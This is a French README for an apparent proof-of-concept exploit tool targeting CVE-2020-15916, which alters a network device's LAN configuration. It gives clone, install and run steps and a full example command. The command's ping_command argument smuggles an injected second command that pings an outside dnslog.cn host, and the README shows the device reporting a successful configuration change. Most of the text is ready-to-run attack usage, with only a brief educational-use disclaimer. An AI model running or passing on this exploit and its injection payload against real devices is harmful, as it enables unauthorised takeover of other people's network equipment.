
Ce projet est un PoC pour exploiter CVE-2020-15916, une vulnérabilité qui permet des modifications non autorisées de la configuration LAN d'un périphérique.
GenLANConfigAttack est un PoC pour l'exploitation de CVE-2020-15916, une vulnérabilité qui permet des modifications non autorisées de la configuration LAN d'un appareil.
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip : L'adresse IP de l'appareil cible.ping_command : Commande à exécuter sur l'appareil cible.session_password : Mot de passe pour l'accès à la session.python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[Réponse de 192.168.0.1] :
{"success":true,"message":"LAN IP configuration updated successfully"}
Ce PoC concerne la vulnérabilité CVE-2020-15916, qui permet à des attaquants de modifier la configuration LAN des appareils vulnérables en exploitant un mécanisme d'authentification faible.
Cet outil est fourni à des fins éducatives uniquement. Utilisez-le de manière responsable et uniquement dans des environnements où vous avez une autorisation explicite.